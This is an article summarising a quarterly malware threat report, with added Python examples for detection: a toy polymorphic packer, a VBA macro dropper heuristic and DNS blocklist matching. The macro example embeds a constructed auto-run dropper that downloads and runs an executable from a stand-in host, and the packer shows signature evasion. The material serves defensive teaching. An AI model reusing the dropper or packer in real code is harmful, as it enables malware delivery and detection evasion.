Cybercriminals embrace stealth tactics and zero-day malware
The total number of malware detections rose by 15% compared to Q1. The largest growth came from Gateway AntiVirus (+85%) and IntelligentAV (+10%). 70% of all malware is now delivered over encrypted (TLS) connections, a record share that shows how important visibility into TLS traffic is for effective detection.
Notable trends
The report from the WatchGuard Threat Lab gives an overview of the most notable malware, network, and endpoint threats of the second quarter of 2025. The main findings of the Q2 2025 Internet Security Report:
Evasive malware +40%, encryption as a cover
Attackers are increasingly using encryption to evade detection. The number of unique malware variants increased by 26%, partly because of polymorphic and encrypted packers: each sample is re-encrypted with a fresh key, so the bytes a signature-based engine would match on differ from one copy to the next while the behaviour stays the same.
Zero-days dominate
76% of all malware is now zero-day (in the report's usage: malware that signature-based detection did not catch), and for malware delivered over TLS that share rises to nearly 90%. This shows that classic, signature-based detection methods are becoming less effective.
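To make the two findings above concrete, here is an added illustration (not code from the report or from WatchGuard) with a toy XOR "packer": the same constructed, harmless payload is packed with different per-sample seeds, a byte signature written for the unpacked payload misses every packed copy, and two checks that do not depend on the payload bytes still fire: a signature on the packer's constant decoder stub, and a byte-entropy threshold. The stub marker, seed length and payload text are assumptions made for the demo.

```python
"""Toy polymorphic packer versus three scanner checks.

Added example for this article; the payload, stub marker and packer format
are constructed for illustration and are not real malware artefacts.
"""
import hashlib
import math

# Constructed stand-in for a malicious payload, repeated so it has a stable
# substring a signature author would pick.
PAYLOAD = b"DOWNLOAD http://c2.invalid/stage2 THEN RUN stage2 WITH shell " * 20

# Byte signature an AV engine might have written for the unpacked payload.
PAYLOAD_SIGNATURE = b"http://c2.invalid/stage2"

# The toy packer's decoder stub is the same in every sample; only the seed
# (and therefore the encrypted body) changes. Assumed marker for the demo.
STUB = b"UNPACK-STUB-v1:"
SEED_LEN = 8


def keystream(seed: bytes, length: int) -> bytes:
    """Expand a per-sample seed into `length` bytes (SHA-256 in counter mode)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def pack(payload: bytes, seed: bytes) -> bytes:
    """Produce one polymorphic sample: STUB || seed || (payload XOR keystream)."""
    if len(seed) != SEED_LEN:
        raise ValueError("seed must be exactly SEED_LEN bytes")
    body = bytes(p ^ k for p, k in zip(payload, keystream(seed, len(payload))))
    return STUB + seed + body


def unpack(sample: bytes) -> bytes:
    """What the stub does at run time: strip the header and XOR the body back."""
    seed = sample[len(STUB):len(STUB) + SEED_LEN]
    body = sample[len(STUB) + SEED_LEN:]
    return bytes(b ^ k for b, k in zip(body, keystream(seed, len(body))))


def signature_hit(data: bytes, signature: bytes) -> bool:
    """Plain substring match: the static-signature model."""
    return signature in data


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Text sits around 4-5, encrypted or packed data near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(sample: bytes, entropy_threshold: float = 7.0) -> dict:
    """The three checks a scanner could apply to an unknown blob."""
    return {
        "payload_signature": signature_hit(sample, PAYLOAD_SIGNATURE),
        "stub_signature": signature_hit(sample, STUB),
        "high_entropy": shannon_entropy(sample) > entropy_threshold,
    }


if __name__ == "__main__":
    # Three "variants": different hashes, same behaviour once unpacked.
    for seed in (b"sample-1", b"sample-2", b"sample-3"):
        s = pack(PAYLOAD, seed)
        print(seed.decode(), hashlib.sha256(s).hexdigest()[:16], triage(s))
```

Every packed variant has a different hash and fails the payload signature, yet the stub signature and the entropy check catch all of them; a real packer varies the stub too, which is why the report's numbers push towards behavioural and sandbox detection rather than better static signatures.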
Ransomware drops 47%, but becomes more targeted
The number of ransomware campaigns is decreasing, but the attacks that do occur are more sophisticated and target high-impact organizations. Extortion groups like Akira and Qilin are among the most active.
Droppers dominate network malware
Seven of the ten most detected payloads were droppers, including Trojan.VBA.Agent.BIZ and PonyStealer, which are activated via macros in documents. The notorious Mirai botnet family also made a comeback, particularly in the APAC region.
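The macro-activated droppers mentioned above share a recognisable shape: an auto-execute entry point, something that launches a process or fetches a file, and string obfuscation to hide the URL. The following added example (written for this article, not a WatchGuard or olevba rule) applies that heuristic to VBA source text; the indicator lists are my own choices and both macro samples are constructed.

```python
"""Heuristic triage of VBA macro source for the dropper pattern.

Added example; keyword lists and both sample macros are constructed for
illustration and are not a vendor's detection rules.
"""
import re

# Each class holds regexes for VBA constructs that place a macro in it.
INDICATORS = {
    "autoexec": [r"\bAutoOpen\b", r"\bAuto_Open\b", r"\bDocument_Open\b",
                 r"\bWorkbook_Open\b"],
    "execute": [r"\bShell\s*\(", r"WScript\.Shell", r"\bCreateObject\s*\(",
                r"\bpowershell\b", r"cmd\.exe", r"\bShellExecute\w*"],
    "download": [r"\bURLDownloadToFile\w*", r"\bXMLHTTP\b",
                 r"WinHttp\.WinHttpRequest", r"\bInternetOpen\w*", r"ADODB\.Stream"],
    "obfuscation": [r"\bStrReverse\s*\(", r"\bXor\b"],
}
CHR_CALL = re.compile(r"\bChr[BW]?\s*\(\s*\d+\s*\)", re.IGNORECASE)
MIN_CHR_CALLS = 5  # assumed threshold: this many Chr() pieces looks like a built string


def find_indicators(vba: str) -> dict:
    """Map indicator class -> sorted list of matched text fragments."""
    found = {}
    for cls, patterns in INDICATORS.items():
        hits = set()
        for pat in patterns:
            m = re.search(pat, vba, re.IGNORECASE)
            if m:
                hits.add(m.group(0))
        if hits:
            found[cls] = sorted(hits)
    chr_calls = len(CHR_CALL.findall(vba))
    if chr_calls >= MIN_CHR_CALLS:
        found.setdefault("obfuscation", []).append(f"{chr_calls} Chr() calls")
    return found


def verdict(vba: str) -> tuple:
    """'dropper-like' if it auto-runs and executes/downloads, else 'suspicious' or 'clean'."""
    found = find_indicators(vba)
    if "autoexec" in found and ("execute" in found or "download" in found):
        return "dropper-like", found
    if found:
        return "suspicious", found
    return "clean", found


# Constructed macro in the dropper shape: auto-run, URL built from Chr(),
# download via urlmon, then execution through WScript.Shell.
MALICIOUS_MACRO = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub AutoOpen()
    Dim u As String, t As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & "//dl.invalid/p.exe"
    t = Environ("TEMP") & "\p.exe"
    URLDownloadToFileA 0, u, t, 0, 0
    Dim o As Object
    Set o = CreateObject("WScript.Shell")
    o.Run "cmd.exe /c " & t, 0
End Sub
'''

# Constructed benign macro: formatting only, no auto-run, no process launch.
BENIGN_MACRO = r'''
Sub FormatReport()
    Dim ws As Worksheet
    Set ws = ActiveSheet
    ws.Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(name, verdict(src))
```

Keyword heuristics are a first pass, not a verdict: macros that stage their real code in document properties or form fields will show fewer indicators, so pair this with sandbox detonation, and treat any auto-execute plus process launch in a document from outside the organisation as worth blocking by default.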
USB malware makes a return
The Threat Lab discovered two new USB-borne variants (PUMPBENCH and HIGHREPS) that install cryptominers. Both use XMRig to mine Monero.
Network attacks increase by 8.3%
The number of network-layer attacks rose slightly, by 8.3%, but they became less diverse: 380 unique signatures were triggered compared to 412 in the previous quarter. A notable newcomer among them was WEB-CLIENT JavaScript Obfuscation in Exploit Kits, an example of how quickly new exploit techniques emerge.
DNS threats persist
Domains linked to the DarkGate RAT loader remained active. This underlines the importance of DNS filtering as a first line of defense.
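DNS filtering only helps if the match is done properly: the blocklist entry has to cover subdomains, trailing dots and mixed case, and must not fire on lookalike names that merely end in the same characters. The added example below (not part of the report, and not a WatchGuard product feature) checks constructed dnsmasq-style query log lines against a constructed blocklist whose names live in the reserved .test TLD; the log format follows dnsmasq's `log-queries` output, and the client addresses are assumed.

```python
"""Blocklist matching over DNS query logs, with parent-domain matching.

Added example; the blocklist and the log lines are constructed for
illustration (reserved .test names, documentation IP ranges).
"""
import re
from typing import Optional

# Constructed blocklist: names a DNS filter would refuse to resolve.
BLOCKLIST = {"loader-c2.test", "drop-site.test"}

# Constructed dnsmasq-style query log: a benign query, a subdomain of a
# blocked name, an upper-case name with a trailing dot, a lookalike that
# must NOT match, and a reply line that carries no query.
SAMPLE_LOG = """\
Oct 12 10:00:01 gw dnsmasq[1234]: query[A] www.example.com from 10.0.0.5
Oct 12 10:00:02 gw dnsmasq[1234]: query[A] cdn.loader-c2.test from 10.0.0.5
Oct 12 10:00:03 gw dnsmasq[1234]: query[AAAA] DROP-SITE.TEST. from 10.0.0.7
Oct 12 10:00:04 gw dnsmasq[1234]: query[A] notloader-c2.test from 10.0.0.9
Oct 12 10:00:05 gw dnsmasq[1234]: reply www.example.com is 192.0.2.1
"""

QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z0-9]+)\] (?P<qname>\S+) from (?P<client>\S+)")


def normalize(name: str) -> str:
    """Canonical form for comparison: lower-case, no trailing dot."""
    return name.rstrip(".").lower()


def blocked_by(qname: str, blocklist: set) -> Optional[str]:
    """Return the blocklist entry covering qname (itself or any parent), else None.

    Walking label by label means 'cdn.loader-c2.test' matches 'loader-c2.test'
    while 'notloader-c2.test' does not, which a plain endswith() would get wrong.
    """
    entries = {normalize(b) for b in blocklist}
    labels = normalize(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in entries:
            return candidate
    return None


def scan_log(text: str, blocklist: set) -> list:
    """Return (client, queried name, matching entry) for every blocked query."""
    hits = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue  # replies, cached answers, config lines
        entry = blocked_by(m["qname"], blocklist)
        if entry:
            hits.append((m["client"], normalize(m["qname"]), entry))
    return hits


if __name__ == "__main__":
    for client, qname, entry in scan_log(SAMPLE_LOG, BLOCKLIST):
        print(f"{client} asked for {qname} (blocked by {entry})")
```

A hit is also a lead for incident response: the client address tells you which host tried to reach the loader infrastructure. The caveat is that DNS filtering is a first line, not the only one: a loader that uses DNS over HTTPS to a public resolver or connects to a hard-coded IP never asks the filtered resolver, which is where the TLS visibility discussed above comes in.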
Attackers hide in plain sight
"We see a strong increase in evasive malware over encrypted channels in Q2," said Corey Nachreiner, Chief Security Officer at WatchGuard. "Attackers are increasingly using stealth tactics to evade detection. For MSPs and IT teams with limited resources, speed, visibility, and integrated protection are essential to effectively combat these threats."